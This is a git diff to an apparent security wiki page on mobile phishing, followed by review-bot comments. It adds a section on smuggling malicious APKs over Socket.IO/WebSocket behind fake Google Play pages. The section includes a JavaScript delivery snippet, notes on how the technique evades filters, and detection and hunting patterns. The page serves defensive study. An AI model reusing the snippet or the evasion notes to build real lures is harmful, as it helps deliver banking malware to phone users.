diff --git a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md index de7c1ab53..7ca3e849f 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/mobile-phishing-malicious-apps.md 
@@ -222,6 +222,49 @@ public void onMessageReceived(RemoteMessage msg){ --- +## Socket.IO/WebSocket-based APK Smuggling + Fake Google Play Pages + +Attackers increasingly replace static APK links with a Socket.IO/WebSocket channel embedded in Google Play–looking lures. This conceals the payload URL, bypasses URL/extension filters, and preserves a realistic install UX. + +Typical client flow observed in the wild: + +```javascript +// Open Socket.IO channel and request payload +const socket = io("wss:///ws", { transports: ["websocket"] }); +socket.emit("startDownload", { app: "com.example.app" }); + +// Accumulate binary chunks and drive fake Play progress UI +const chunks = []; +socket.on("chunk", (chunk) => chunks.push(chunk)); +socket.on("downloadProgress", (p) => updateProgressBar(p)); + +// Assemble APK client‑side and trigger browser save dialog +socket.on("downloadComplete", () => { + const blob = new Blob(chunks, { type: "application/vnd.android.package-archive" }); + const url = URL.createObjectURL(blob); + const a = document.createElement("a"); + a.href = url; a.download = "app.apk"; a.style.display = "none"; + document.body.appendChild(a); a.click(); +}); +``` + +Why it evades simple controls: +- No static APK URL is exposed; payload is reconstructed in memory from WebSocket frames. +- URL/MIME/extension filters that block direct .apk responses may miss binary data tunneled via WebSockets/Socket.IO. +- Crawlers and URL sandboxes that don’t execute WebSockets won’t retrieve the payload. + +Hunting and detection ideas: +- Web/network telemetry: flag WebSocket sessions that transfer large binary chunks followed by creation of a Blob with MIME application/vnd.android.package-archive and a programmatic `` click. Look for client strings like socket.emit('startDownload'), and events named chunk, downloadProgress, downloadComplete in page scripts. 
+- Play-store spoof heuristics: on non-Google domains serving Play-like pages, hunt for Google Play UI strings such as http.html:"VfPpkd-jY41G-V67aGc", mixed-language templates, and fake “verification/progress” flows driven by WS events. +- Controls: block APK delivery from non-Google origins; enforce MIME/extension policies that include WebSocket traffic; preserve browser safe-download prompts. + +See also WebSocket tradecraft and tooling: + +{{#ref}} +../../pentesting-web/websocket-attacks.md +{{#endref}} + + ## Android Accessibility/Overlay & Device Admin Abuse, ATS automation, and NFC relay orchestration – RatOn case study The RatOn banker/RAT campaign (ThreatFabric) is a concrete example of how modern mobile phishing operations blend WebView droppers, Accessibility-driven UI automation, overlays/ransom, Device Admin coercion, Automated Transfer System (ATS), crypto wallet takeover, and even NFC-relay orchestration. This section abstracts the reusable techniques. @@ -394,5 +437,8 @@ Background: [NFSkate NFC relay](https://www.threatfabric.com/blogs/ghost-tap-new - [Firebase Cloud Messaging — Docs](https://firebase.google.com/docs/cloud-messaging) - [The Rise of RatOn: From NFC heists to remote control and ATS (ThreatFabric)](https://www.threatfabric.com/blogs/the-rise-of-raton-from-nfc-heists-to-remote-control-and-ats) - [GhostTap/NFSkate – NFC relay cash-out tactic (ThreatFabric)](https://www.threatfabric.com/blogs/ghost-tap-new-cash-out-tactic-with-nfc-relay) +- [Banker Trojan Targeting Indonesian and Vietnamese Android Users (DomainTools)](https://dti.domaintools.com/banker-trojan-targeting-indonesian-and-vietnamese-android-users/) +- [DomainTools SecuritySnacks – ID/VN Banker Trojans (IOCs)](https://github.com/DomainTools/SecuritySnacks/blob/main/2025/BankerTrojan-ID-VN) +- [Socket.IO](https://socket.io) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}}
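Review bot: in the first hunk (the new `## Socket.IO/WebSocket-based APK Smuggling` section) the client snippet connects to `io("wss:///ws", { transports: ["websocket"] })`, whose URL has an empty host; either mark the placeholder explicitly (e.g. `wss://<lure-host>/ws`) or note that the host was redacted, otherwise readers will copy an invalid endpoint into their own detections. Three smaller points in the same hunk: the detection bullet reads "a programmatic `` click" with empty backticks, so the element name (`<a>`) was lost, most likely because the raw tag was swallowed by the renderer; write it as `` `<a>` `` so it survives. The suggested hunt string `socket.emit('startDownload')` uses single quotes while the snippet above it uses double quotes, so a literal match would miss the very sample shown; a quote-agnostic pattern such as `emit\(["']startDownload["']` is safer. And `http.html:"VfPpkd-jY41G-V67aGc"` is Shodan-style search syntax and should say so. Finally, the "Controls" bullet needs a caveat: WebSocket binary frames carry no MIME type or file extension, so "MIME/extension policies that include WebSocket traffic" can only be enforced by decoding Socket.IO binary attachments at the proxy or by restricting WebSocket egress to approved hosts, and "block APK delivery from non-Google origins" breaks legitimate sideloading (enterprise MDM, F-Droid) unless scoped to managed devices.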
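Review bot: the second hunk adds the DomainTools write-up and its SecuritySnacks IOC directory to the references, but nothing in the new section cites them, so the "Typical client flow observed in the wild" claim stays unsourced on the page; add an inline citation (or the campaign name from the DomainTools post) where the snippet is introduced so the reference is reachable from the text. The `- [Socket.IO](https://socket.io)` entry is a product homepage rather than a source for the technique; if it stays, it fits better as a link at the first mention of Socket.IO in the body than in the references list. The trailing change that adds the missing newline after the banner include is fine.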